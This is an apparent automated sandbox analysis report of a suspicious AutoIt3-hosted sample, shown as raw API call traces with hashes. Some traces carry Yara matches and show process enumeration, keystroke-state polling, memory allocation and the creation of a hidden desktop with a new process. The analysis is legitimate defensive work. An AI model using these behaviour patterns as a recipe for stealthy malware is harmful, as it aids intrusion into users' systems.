                                        • Part of subcall function 03CC5C24: RegQueryValueExA.ADVAPI32(?,03CC5EA4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,03CC5D28,?,80000001), ref: 03CC5D00
                                        • Part of subcall function 03CC5C24: RegCloseKey.ADVAPI32(?,03CC5D2F,00000000,00000000,00000005,00000000,03CC5D28,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03CC5D22
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Open$FileModuleNameQueryValue$Close
                                      • String ID:
                                      • API String ID: 2796650324-0
                                      • Opcode ID: 5f0301a89e09c4e581c626b153b1e41430e2d8e776082f7fb6fe3419c70388bb
                                      • Instruction ID: 2a462aaddd47a2a51f94a4c6ca1b7a4d80cbfd72967db63dcfd2792e98f1eb81
                                      • Opcode Fuzzy Hash: 5f0301a89e09c4e581c626b153b1e41430e2d8e776082f7fb6fe3419c70388bb
                                      • Instruction Fuzzy Hash: 4DE09275A103508FCB10DE5DC8C0A4273D8AF09760F440995EC54CF346D370EE2087D0
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00800000,?,00000105), ref: 011D2E9B
                                        • Part of subcall function 011D3111: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 011D312C
                                        • Part of subcall function 011D3111: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 011D314A
                                        • Part of subcall function 011D3111: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 011D3168
                                        • Part of subcall function 011D3111: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 011D3186
                                        • Part of subcall function 011D3111: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,011D3215,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 011D31CF
                                        • Part of subcall function 011D3111: RegQueryValueExA.ADVAPI32(?,011D3391,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,011D3215,?,80000001), ref: 011D31ED
                                        • Part of subcall function 011D3111: RegCloseKey.ADVAPI32(?,011D321C,00000000,00000000,00000005,00000000,011D3215,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 011D320F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Open$FileModuleNameQueryValue$Close
                                      • String ID:
                                      • API String ID: 2796650324-0
                                      • Opcode ID: b71db44c6d7a6867040f1260aada16823b63df32703d9526eeae95d1c3033a29
                                      • Instruction ID: 6523e21957be72576b1901bf3da09e2425f6bc4fa9fbf60be7bd7c988fa22005
                                      • Opcode Fuzzy Hash: b71db44c6d7a6867040f1260aada16823b63df32703d9526eeae95d1c3033a29
                                      • Instruction Fuzzy Hash: F4E01272A003259FCB14DE6CC8C1A8777D8AF18754F444565ED64DF346D371D95087E1
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008209E4
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LongNamePath_memmove
                                      • String ID:
                                      • API String ID: 2514874351-0
                                      • Opcode ID: 6e91897a4ccdde10742a8eea81a260f9f582ac42c890b3abb9d1dc3f5bd27ee9
                                      • Instruction ID: cb9cc55af13c383b7e9e790c6875b1ea6f60919c4bee3a4b7cc4257df40e2be6
                                      • Opcode Fuzzy Hash: 6e91897a4ccdde10742a8eea81a260f9f582ac42c890b3abb9d1dc3f5bd27ee9
                                      • Instruction Fuzzy Hash: D1E086369001285BCB21A6AC9C09FEAB7DDEF896A1F0441B6FD0CD7304D9609C8186D1
                                      APIs
                                        • Part of subcall function 03CDAE54: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,03CDB0DB,00000000,?,03CEB350,00000000,03CEB636,?,?,?,?,00000000,00000000), ref: 03CDAE68
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 03CDAE80
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 03CDAE92
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 03CDAEA4
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 03CDAEB6
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 03CDAEC8
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 03CDAEDA
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32First), ref: 03CDAEEC
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 03CDAEFE
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 03CDAF10
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 03CDAF22
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 03CDAF34
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 03CDAF46
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32First), ref: 03CDAF58
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 03CDAF6A
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 03CDAF7C
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 03CDAF8E
                                      • Process32Next.KERNEL32(00000000,00000128), ref: 03CDB121
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$HandleModuleNextProcess32
                                      • String ID:
                                      • API String ID: 2237597116-0
                                      • Opcode ID: 93b84616e8f01897533bdb028ecafd9f0a030561d81091eb06fa095667988100
                                      • Instruction ID: 3a12a93fcf7e2f73e9bf2d6dae13c86ff0f6faa3ccdbd49fe78c2e177446570a
                                      • Opcode Fuzzy Hash: 93b84616e8f01897533bdb028ecafd9f0a030561d81091eb06fa095667988100
                                      • Instruction Fuzzy Hash: EFC0805361162017CA10B5F53C844D3878CCD590B33090562B605D7101D22A4C14A390
                                      APIs
                                        • Part of subcall function 03CDAE54: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,03CDB0DB,00000000,?,03CEB350,00000000,03CEB636,?,?,?,?,00000000,00000000), ref: 03CDAE68
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 03CDAE80
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 03CDAE92
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 03CDAEA4
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 03CDAEB6
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 03CDAEC8
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 03CDAEDA
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32First), ref: 03CDAEEC
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 03CDAEFE
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 03CDAF10
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 03CDAF22
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 03CDAF34
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 03CDAF46
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32First), ref: 03CDAF58
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 03CDAF6A
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 03CDAF7C
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 03CDAF8E
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03CDB0E1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 2242398760-0
                                      • Opcode ID: 669f63a559b838472ea0148715926dfef36899811c19ad7bc295b98b9a1e5a92
                                      • Instruction ID: d96e06b53596ecf52065243ac23f12e58ebda103943724e61540b9ed36ad273a
                                      • Opcode Fuzzy Hash: 669f63a559b838472ea0148715926dfef36899811c19ad7bc295b98b9a1e5a92
                                      • Instruction Fuzzy Hash: 02C08CE36022201BDA20B6F93C888D3878CCD991F330904A2BA09D7202D2298C10A2E0
                                      APIs
                                        • Part of subcall function 03CDAE54: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,03CDB0DB,00000000,?,03CEB350,00000000,03CEB636,?,?,?,?,00000000,00000000), ref: 03CDAE68
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 03CDAE80
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 03CDAE92
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 03CDAEA4
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 03CDAEB6
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 03CDAEC8
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 03CDAEDA
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32First), ref: 03CDAEEC
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 03CDAEFE
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 03CDAF10
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 03CDAF22
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 03CDAF34
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 03CDAF46
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32First), ref: 03CDAF58
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 03CDAF6A
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 03CDAF7C
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 03CDAF8E
                                      • Process32First.KERNEL32(00000000,00000128), ref: 03CDB101
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$FirstHandleModuleProcess32
                                      • String ID:
                                      • API String ID: 2774106396-0
                                      • Opcode ID: 21bfb5612ca7519054580218cdd77cce5cbf070cb9776d990a9c2e9c2cf0d282
                                      • Instruction ID: 037f117a2ad2d914980328bac8dfe897c25eef495f5f3730e7e39d692888215b
                                      • Opcode Fuzzy Hash: 21bfb5612ca7519054580218cdd77cce5cbf070cb9776d990a9c2e9c2cf0d282
                                      • Instruction Fuzzy Hash: 1DC08CA3A122201BCB20F6F93CC88D3878CDD590B330905A2FA0AD7202D22A8C14B2A0
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 008013C8
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                        • Part of subcall function 00802714: GetCursorPos.USER32(?), ref: 00802727
                                        • Part of subcall function 00802714: ScreenToClient.USER32(008C77B0,?), ref: 00802744
                                        • Part of subcall function 00802714: GetAsyncKeyState.USER32(00000001), ref: 00802769
                                        • Part of subcall function 00802714: GetAsyncKeyState.USER32(00000002), ref: 00802777
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AsyncStateWindow$ClientCursorForegroundLongScreen
                                      • String ID:
                                      • API String ID: 4074248120-0
                                      • Opcode ID: 54af45024c2b67e935900e94b089aa8daa7248943c035263b0624ad5f160df8f
                                      • Instruction ID: bc2090577368b34fe709a31610116568b6f7b3501627e36e1556bf0e3458456d
                                      • Opcode Fuzzy Hash: 54af45024c2b67e935900e94b089aa8daa7248943c035263b0624ad5f160df8f
                                      • Instruction Fuzzy Hash: 77D05E302000105BC954A75C9C4DE5E3765FF45330B184615F515CB2E1CB725C52CEA6
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeString
                                      • String ID:
                                      • API String ID: 3341692771-0
                                      • Opcode ID: 4a835d830b45d8efaa41f9c2d980658df14287f71c860b080632fe162d2af2c5
                                      • Instruction ID: c31abbb58d553aa99871c2ef6c3cfcf6348f3838bd41bb9dd0ecc1e5c17337cb
                                      • Opcode Fuzzy Hash: 4a835d830b45d8efaa41f9c2d980658df14287f71c860b080632fe162d2af2c5
                                      • Instruction Fuzzy Hash: E5C08CBC9313C26DFF0EEF33492597BA39CEE9110138E856CEC02CC002DA24E5426628
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __wfsopen
                                      • String ID:
                                      • API String ID: 197181222-0
                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                      • Instruction ID: 041a9fc10dc8e09325d5773222101474eb659ea7c4adc7ec8ccaf0ee6824f47a
                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                      • Instruction Fuzzy Hash: 13B092B648020C77CE012A86FC03A697B29AB40668F408020FB0C6C162A673A6A0968A
                                      APIs
                                      • LoadLibraryA.KERNEL32(00000000,03D23A94,03CE74F2,00000000,03CE7CC3,?,00000000,03CE7CE0), ref: 03CE7463
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 572d56aa8742d40c19f64204b36ef036639bc2fb8981892feb8b1842e28b82ca
                                      • Instruction ID: de56eb92fdb329fcdb9e2ee5c0447a142ca222b32764012ccbe2f8a0c68b76ff
                                      • Opcode Fuzzy Hash: 572d56aa8742d40c19f64204b36ef036639bc2fb8981892feb8b1842e28b82ca
                                      • Instruction Fuzzy Hash: 0DA001AABA1380268A45B6BA1DE490A468C6A581123965979E109DB242DD69C8643124
                                      APIs
                                      • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 03CC1805
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 3a5eb3ab3680525a798d46aa179450cfa81b14b08f86196867fd1d73819517c3
                                      • Instruction ID: d228fc07425bc60ef85e9dd4afd47dbd94493bfaae50fc2fec2f861596af7527
                                      • Opcode Fuzzy Hash: 3a5eb3ab3680525a798d46aa179450cfa81b14b08f86196867fd1d73819517c3
                                      • Instruction Fuzzy Hash: A921CEB66182869FC750CF2DC880A5AB7E4FF88350B28896DF999CB345D330E944CB52
                                      APIs
                                      • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 011CFDFA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 58c02b4aefddd53cdc7f0858ee0c929407db5a46c44ebbc669d8b4e69910777a
                                      • Instruction ID: aa36fae81d20131c3af5bdf7558881de2f7c169321d7047444d1f3cd4a2f64c6
                                      • Opcode Fuzzy Hash: 58c02b4aefddd53cdc7f0858ee0c929407db5a46c44ebbc669d8b4e69910777a
                                      • Instruction Fuzzy Hash: F921FEB5604246DFCB54CF2CC880A9AB7E1FF98B10F248928F999CB345D330E955CB92
                                      APIs
                                        • Part of subcall function 03CDB0D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03CDB0E1
                                        • Part of subcall function 03CDB0F0: Process32First.KERNEL32(00000000,00000128), ref: 03CDB101
                                      • CloseHandle.KERNEL32(?,03CF4502), ref: 03CF44F5
                                        • Part of subcall function 03CDB110: Process32Next.KERNEL32(00000000,00000128), ref: 03CDB121
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 0ed134d3b32308626bd52b0eb006dced13fe04040c577c794a1115e6912c398d
                                      • Instruction ID: d1395d5caf23e2f6973a6f9a586ddf6b52173f3d8b8d73bc84f605960d1541e8
                                      • Opcode Fuzzy Hash: 0ed134d3b32308626bd52b0eb006dced13fe04040c577c794a1115e6912c398d
                                      • Instruction Fuzzy Hash: 1421D574904B08AFDB59DF62CC609DEBBF9FB49700F4284B5FA14E2610EA345B50DA10
                                      APIs
                                      • VirtualFree.KERNEL32(?,?,00004000), ref: 03CC18BC
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 9570bea50f531c909f8f14ce2c38f2c923584b763fb9ad539afedd86785ebb2a
                                      • Instruction ID: 9dd69dc298fbd07b24bbef2c270818ed3fdbdf83de483a11f17734c8ccbfe044
                                      • Opcode Fuzzy Hash: 9570bea50f531c909f8f14ce2c38f2c923584b763fb9ad539afedd86785ebb2a
                                      • Instruction Fuzzy Hash: 59210EB6A18342CFC710CF29D880A1AB7E4FF98310B2849A9E994CB304D330E908CF52
                                      APIs
                                      • VirtualFree.KERNEL32(?,?,00004000), ref: 011CFEB1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 974c0e817647fc61280f705dd8f750cf8ac000e231c02660e3c42b497fdb3524
                                      • Instruction ID: 55c23309c53036fe9cde0ad14e6b1ad1778bd9ec7fb203ca9f2a4e18075d3a6b
                                      • Opcode Fuzzy Hash: 974c0e817647fc61280f705dd8f750cf8ac000e231c02660e3c42b497fdb3524
                                      • Instruction Fuzzy Hash: 60210EB4205216CFC724CF2CC880A5AB7E1FF99B14B204969E594CB345D330E909CF62
                                      APIs
                                      • CloseHandle.KERNEL32(00000000,00000000,?,00000000,03CF4829,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,03CF47A8), ref: 03CF478D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 08caa359f5f6340b23a60eafff36780ed39aab28be1a4e0ae7551238d5c00b32
                                      • Instruction ID: ab23945c4f53c438642639e95103cbd37049a7aa295ac489ce3e7cc5542f067f
                                      • Opcode Fuzzy Hash: 08caa359f5f6340b23a60eafff36780ed39aab28be1a4e0ae7551238d5c00b32
                                      • Instruction Fuzzy Hash: B6014C356503447EE365EAA5CCD2F6FB3ACDB45B10FA24579F610EB1D0D6705E00A150
                                      APIs
                                        • Part of subcall function 03CF3E5C: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,03CF3EF8,?,00000000,03CF3F18,?,?,?,?), ref: 03CF3EAB
                                        • Part of subcall function 03CF3E5C: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,03CF3EF8,?,00000000,03CF3F18), ref: 03CF3EBA
                                        • Part of subcall function 03CF3E5C: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003), ref: 03CF3EE3
                                        • Part of subcall function 03CF3E5C: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000), ref: 03CF3EE9
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,03CF3FA0,?,00000000,03CF3FC0,?,?,?,?), ref: 03CF3F91
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateFreeHandleReadSizeVirtual
                                      • String ID:
                                      • API String ID: 931541440-0
                                      • Opcode ID: 76dab2d014b828e10d6f7b0598b087a25277357301ca1b4bbe6fca733795286d
                                      • Instruction ID: c23f32a4dfce55a8113d32b63bd668953d3ee566a81a9ddb2810b1f1e0cea4b8
                                      • Opcode Fuzzy Hash: 76dab2d014b828e10d6f7b0598b087a25277357301ca1b4bbe6fca733795286d
                                      • Instruction Fuzzy Hash: ED01D638A04384BFD756DFA6CC61A5DB7F8EB88710F9284F4E510D7650D6346E10DA10
                                      APIs
                                      • Sleep.KERNEL32(00000001,00000000,03CF2F73), ref: 03CF2F2A
                                        • Part of subcall function 03CF3704: CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 03CF37CE
                                        • Part of subcall function 03CF3704: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,03CF38FD,?,?,?), ref: 03CF380F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$DesktopProcessSleep
                                      • String ID:
                                      • API String ID: 4216851738-0
                                      • Opcode ID: 009f2de3f3c98a333b7955e156263404a28db5a522898554ce6aa059f2909c60
                                      • Instruction ID: a177e571f7cffe967df57874f831fbe916ff0ef875190a560d856fea327aaa55
                                      • Opcode Fuzzy Hash: 009f2de3f3c98a333b7955e156263404a28db5a522898554ce6aa059f2909c60
                                      • Instruction Fuzzy Hash: FF017178A14348BFDB41DFA5CC91B8DF7B4EB44700FA284B5D910EB690DB706B00EA44
                                      APIs
                                        • Part of subcall function 03CF4724: CloseHandle.KERNEL32(00000000,00000000,?,00000000,03CF4829,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,03CF47A8), ref: 03CF478D
                                      • Sleep.KERNEL32(00000002,00000000,03CF4829,?,00000001), ref: 03CF4809
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleSleep
                                      • String ID:
                                      • API String ID: 252777609-0
                                      • Opcode ID: 2f16c055615ded50332f3f13093a146576a4b061185029a7c5b7cb6e7d743991
                                      • Instruction ID: 649ccb52f851f98a2c951711fc8562fec4c379797d69f3d2d8454a7d4945fcf1
                                      • Opcode Fuzzy Hash: 2f16c055615ded50332f3f13093a146576a4b061185029a7c5b7cb6e7d743991
                                      • Instruction Fuzzy Hash: 63F02839A103C8EFDB5AEBA6D851A9EF7F8EB48310FA24079D500D7690DB309F00E610
                                      APIs
